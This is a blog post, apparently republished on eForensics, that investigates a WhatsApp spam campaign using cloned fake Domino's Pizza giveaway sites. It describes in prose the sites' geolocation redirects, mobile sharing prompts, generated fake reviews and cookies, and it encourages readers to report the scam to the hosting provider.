
At the time of the writing, there was no malicious software detected on the site by either of those malware analysis services.

I interacted with the website in several ways but could not identify any functionality that would lead me to believe the site harvested login credentials, financial or personal information.

It was time to dig deeper into the source code.

In previous posts I mentioned the use of the F12 key for investigating websites.

Pressing F12 switches on Web Developer mode on a website you are currently viewing in your browser (known as Developer Tools in both Google Chrome and Microsoft Edge).

Some useful information was gleaned after inspecting the target website:

1. Geoplugin and redirections to other websites

The website contains a simple Javascript that utilises geoplugin.net to geolocate a user’s IP address and redirect to other websites, depending on the user’s location:

This is a valuable discovery as suddenly we reveal 4 other websites associated with this scam.

Note how the Italian site is the only non-English option out of them all. Perhaps this could indicate the persons behind this scam are Italians? Or Spanish, due to the elements of the Spanish language here and there in the source code (wide speculation, I know).

The scam websites are all direct clones and all but one impersonate Dominos Pizza website – apart from the Indian version served to any user with an Indian IP, which offers a false promise of free Adidas merchandise:

2. Browser user agent scan

When you interact with the fake website, it calls a function to scan your browser user agent.

I have previously talked about user fingerprinting conducted by websites here.

Essentially, the scam website detects if a user is accessing the site from a mobile device and it prompts the Whatsapp mobile app to share the link.

If you access the site via a desktop browser, this will not work.

3. Fake user reviews

You have probably noticed the presence of “user reviews” praising the seemingly legitimate giveaway under the sharing buttons.

They do look fake, but how do they work?

The website is utilising the randomuser.me API to pull in 5 randomly generated users and it pairs them off each with a short made-up review text:

4. Cookies

Cookies can be used for tracking and this website has several of those.

I don’t believe in this case they are a huge threat, but it’s always recommended to block cookies.

I personally use the uBlock Origin plugin and it does the job very well.

Concluding thoughts: right now the Dominos scam website appears to only have the spam proliferation functionalities, but this can change as it is very new (only 1 day old during the time of writing).

The scammers can monitor the scale of user interaction with the URL and based on that they can adapt their tactics, ranging from phishing for logins and passwords to deploying malware on users’ phones.

The more people report this scam to the hosting provider, the better the chance we have that namecheap removes and blacklists the scammers.

I would encourage you all to individually email abuse@namecheaphosting.com and report the site to them.

Remain safe and until the next time.

Orinially published: https://www.osintme.com/index.php/2020/05/22/new-spam-phishing-campaign-on-whatsapp-investigating-fake-dominos-pizza-websites/

The post New spam / phishing campaign on Whatsapp – investigating fake Dominos pizza websites | By Maciej Makowski appeared first on eForensics.

↧

#1 - Fostering Open Communications

#2 - Educate Your Employees on the DevOps Integration

#3- Utilizing the “Right” Collaboration Software

#4 - A Single Leader Overlooking the entire DevOps process can cause disruption

Related Posts

Related Posts

Related Posts

Dedicated Computer Solution

ESXI Server Solution

Setting up Security Onion

But wait! There’s more!

Sysmon all the things

Winlogbeat for the win!

Last step!

Compile Your C Shell Payload in Windows

The Dangers of Fraud

Signs of a Bad Apple

6 Steps To Take To Stop Fraud

1. Set Checks and Balances

2. Make the Rules Clear

3. Make Employees Take Time Off

4. Reduce Risks

5. Implement Training

6. Follow Through

Keep Your Business Safe

Related Posts

1. Geoplugin and redirections to other websites

2. Browser user agent scan

3. Fake user reviews

4. Cookies